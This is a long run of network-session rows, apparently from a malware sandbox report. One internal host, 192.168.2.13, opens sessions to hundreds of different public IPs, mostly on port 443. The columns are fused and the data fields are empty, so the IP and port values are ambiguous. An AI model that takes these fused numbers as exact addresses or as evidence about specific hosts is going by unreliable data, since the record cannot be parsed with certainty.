                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13294192.168.2.1357086183.166.17.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13295192.168.2.134313423.95.226.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13296192.168.2.135772035.92.92.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13297192.168.2.134552097.162.146.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13298192.168.2.133463051.10.12.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13299192.168.2.1354148206.108.183.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13300192.168.2.134863248.230.56.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13301192.168.2.1352168178.55.211.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13302192.168.2.134074438.40.154.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13303192.168.2.134694245.212.82.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13304192.168.2.134850237.117.123.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13305192.168.2.135761219.43.27.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13306192.168.2.1336514131.65.204.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13307192.168.2.1346134196.162.142.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13308192.168.2.1349822152.33.122.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13309192.168.2.135379688.226.218.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13310192.168.2.1344460182.9.97.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13311192.168.2.1357852179.126.15.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13312192.168.2.1338058200.160.7.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13313192.168.2.135406042.223.181.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13314192.168.2.133541069.108.11.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13315192.168.2.134853090.117.59.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13316192.168.2.1353776200.63.209.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13317192.168.2.134922820.234.171.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13318192.168.2.135540623.162.29.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13319192.168.2.1337086173.0.183.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13320192.168.2.1338392104.105.181.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13321192.168.2.1349314155.50.31.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13322192.168.2.1338582101.204.59.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13323192.168.2.13401321.112.67.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13324192.168.2.134944489.23.235.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13325192.168.2.1340872186.254.90.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13326192.168.2.1356602182.10.149.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13327192.168.2.134717842.37.192.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13328192.168.2.134922071.4.25.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13329192.168.2.135977091.94.163.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13330192.168.2.1341778185.10.102.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13331192.168.2.1336274203.59.118.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13332192.168.2.135114037.177.152.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13333192.168.2.13492108.125.159.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13334192.168.2.133480086.55.237.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13335192.168.2.1354864187.82.205.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13336192.168.2.1333612156.173.166.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13337192.168.2.134722065.63.137.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13338192.168.2.135259483.5.147.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13339192.168.2.1341036137.33.235.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13340192.168.2.13374241.33.206.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13341192.168.2.135327239.128.201.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13342192.168.2.1345250139.83.120.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13343192.168.2.134940661.240.174.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13344192.168.2.1354840105.23.149.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13345192.168.2.1355676221.109.203.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13346192.168.2.1349980105.16.89.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13347192.168.2.135094289.180.160.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13348192.168.2.135238079.59.196.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13349192.168.2.133442825.181.45.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13350192.168.2.1339430164.185.147.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13351192.168.2.1354150170.14.110.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13352192.168.2.135333243.72.116.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13353192.168.2.1344564193.209.148.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13354192.168.2.134089019.245.93.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13355192.168.2.134994638.102.88.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13356192.168.2.135567662.14.46.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13357192.168.2.134908036.74.208.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13358192.168.2.134806867.145.6.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13359192.168.2.1349764136.244.234.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13360192.168.2.1353006177.11.42.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13361192.168.2.1350914223.5.183.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13362192.168.2.1353396102.148.80.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13363192.168.2.1356792139.120.33.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13364192.168.2.1359298179.98.255.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13365192.168.2.1334108125.58.106.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13366192.168.2.1341390142.94.70.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13367192.168.2.135226883.223.37.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13368192.168.2.135048675.252.92.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13369192.168.2.134223296.52.191.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13370192.168.2.135180041.61.2.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13371192.168.2.13568424.165.53.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13372192.168.2.135766493.35.19.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13373192.168.2.134096831.1.22.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13374192.168.2.134138863.2.237.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13375192.168.2.1360790103.104.89.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13376192.168.2.1335376222.51.233.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13377192.168.2.1359236216.202.89.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13378192.168.2.1360070150.208.192.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13379192.168.2.134126276.90.230.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13380192.168.2.134232260.109.147.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13381192.168.2.1353064204.111.197.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13382192.168.2.1348936137.58.138.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13383192.168.2.1353106157.50.193.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13384192.168.2.134650868.165.74.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13385192.168.2.134764869.208.120.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13386192.168.2.1351824182.166.209.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13387192.168.2.1347392190.112.63.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13388192.168.2.1345574138.117.191.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13389192.168.2.1357346184.207.197.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13390192.168.2.133431898.252.2.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13391192.168.2.13549464.122.248.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13392192.168.2.134066886.181.137.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13393192.168.2.1346548173.242.132.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13394192.168.2.1340944202.128.61.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13395192.168.2.1348272212.208.89.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13396192.168.2.1345782162.95.117.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13397192.168.2.1340422210.200.132.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13398192.168.2.134003657.12.155.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13399192.168.2.135968296.219.245.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13400192.168.2.1338364206.51.8.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13401192.168.2.1353954144.218.134.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13402192.168.2.1353094203.242.144.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13403192.168.2.1359692193.96.8.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13404192.168.2.1335126125.131.244.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13405192.168.2.135168820.130.47.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13406192.168.2.1344720116.38.13.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13407192.168.2.134243478.226.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13408192.168.2.1348378162.62.163.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13409192.168.2.1356982219.168.27.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13410192.168.2.133532277.198.111.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13411192.168.2.1348070153.62.155.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13412192.168.2.1338900132.108.213.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13413192.168.2.133828886.106.237.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13414192.168.2.1343908150.29.78.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13415192.168.2.1357814213.57.6.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13416192.168.2.133844090.152.202.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13417192.168.2.1347980130.103.19.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13418192.168.2.1350738126.102.183.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13419192.168.2.134511251.0.170.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13420192.168.2.1354294119.69.174.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13421192.168.2.1340462142.159.40.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13422192.168.2.134944862.102.105.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13423192.168.2.135636814.172.158.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13424192.168.2.1352798135.244.90.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13425192.168.2.1338382221.233.53.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13426192.168.2.1334562101.138.202.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13427192.168.2.134412090.170.172.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13428192.168.2.1339612195.100.210.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13429192.168.2.134180497.121.12.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13430192.168.2.1352364145.219.145.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13431192.168.2.1348066201.13.136.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13432192.168.2.1350838121.146.66.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13433192.168.2.1359140200.125.15.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13434192.168.2.135647666.50.103.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13435192.168.2.1344126167.69.37.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13436192.168.2.133615036.141.19.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13437192.168.2.1349966162.176.96.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13438192.168.2.134369257.82.13.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13439192.168.2.134447262.190.18.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13440192.168.2.133984267.254.220.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13441192.168.2.1359682212.227.238.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13442192.168.2.133305662.181.74.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13443192.168.2.1334530116.54.108.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13444192.168.2.1359654157.26.28.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13445192.168.2.1345782120.65.212.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13446192.168.2.1336236149.227.162.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13447192.168.2.1339632112.84.3.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13448192.168.2.1358256200.135.182.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13449192.168.2.134052460.174.55.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13450192.168.2.1359318136.125.18.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13451192.168.2.134440490.148.127.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13452192.168.2.135691279.230.125.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13453192.168.2.133869470.98.98.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13454192.168.2.135469613.218.200.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13455192.168.2.1339166166.105.77.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13456192.168.2.1347074126.149.199.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13457192.168.2.134048446.12.58.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13458192.168.2.1360064152.164.208.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13459192.168.2.1352772113.10.57.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13460192.168.2.135761282.187.126.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13461192.168.2.1353690198.152.40.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13462192.168.2.1339976117.1.175.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13463192.168.2.1353902165.90.159.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13464192.168.2.134803494.84.37.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13465192.168.2.134995483.246.189.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13466192.168.2.135989043.200.24.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13467192.168.2.1348204201.113.38.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13468192.168.2.134542027.20.15.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13469192.168.2.1351144193.218.213.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13470192.168.2.134244282.244.244.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13471192.168.2.1359834114.118.144.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13472192.168.2.1358924106.193.50.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13473192.168.2.135980093.136.177.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13474192.168.2.1348894144.171.21.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13475192.168.2.135236651.35.173.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13476192.168.2.135585445.6.96.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13477192.168.2.134789269.113.36.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13478192.168.2.134363498.92.89.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13479192.168.2.1348010177.123.97.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13480192.168.2.1347776208.174.1.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13481192.168.2.135930284.39.138.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13482192.168.2.1340040186.247.217.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13483192.168.2.1340556218.176.170.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13484192.168.2.1352584123.115.209.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13485192.168.2.133959894.237.204.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13486192.168.2.135781232.64.54.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13487192.168.2.135574499.64.23.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13488192.168.2.1343564175.17.35.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13489192.168.2.136080634.203.42.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13490192.168.2.1351484208.77.36.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13491192.168.2.1334226114.179.103.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13492192.168.2.134710267.201.172.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13493192.168.2.1336714141.211.65.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13494192.168.2.135204486.85.139.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13495192.168.2.135035238.152.153.1998080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13496192.168.2.1335796126.165.239.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13497192.168.2.1343506130.118.125.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13498192.168.2.13497269.32.124.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13499192.168.2.1333396177.175.33.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13500192.168.2.1354300187.200.125.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13501192.168.2.1342430124.222.136.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13502192.168.2.1349794203.12.115.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13503192.168.2.1343206188.183.36.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13504192.168.2.1354738201.228.74.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13505192.168.2.134280277.113.207.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13506192.168.2.133975279.111.69.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13507192.168.2.1345652165.180.124.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13508192.168.2.133908240.180.209.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13509192.168.2.134164479.154.152.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13510192.168.2.1352872143.43.60.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13511192.168.2.135175483.26.143.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13512192.168.2.1358728154.250.82.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13513192.168.2.1343572197.62.84.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13514192.168.2.134025857.196.236.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13515192.168.2.133774654.174.163.192443
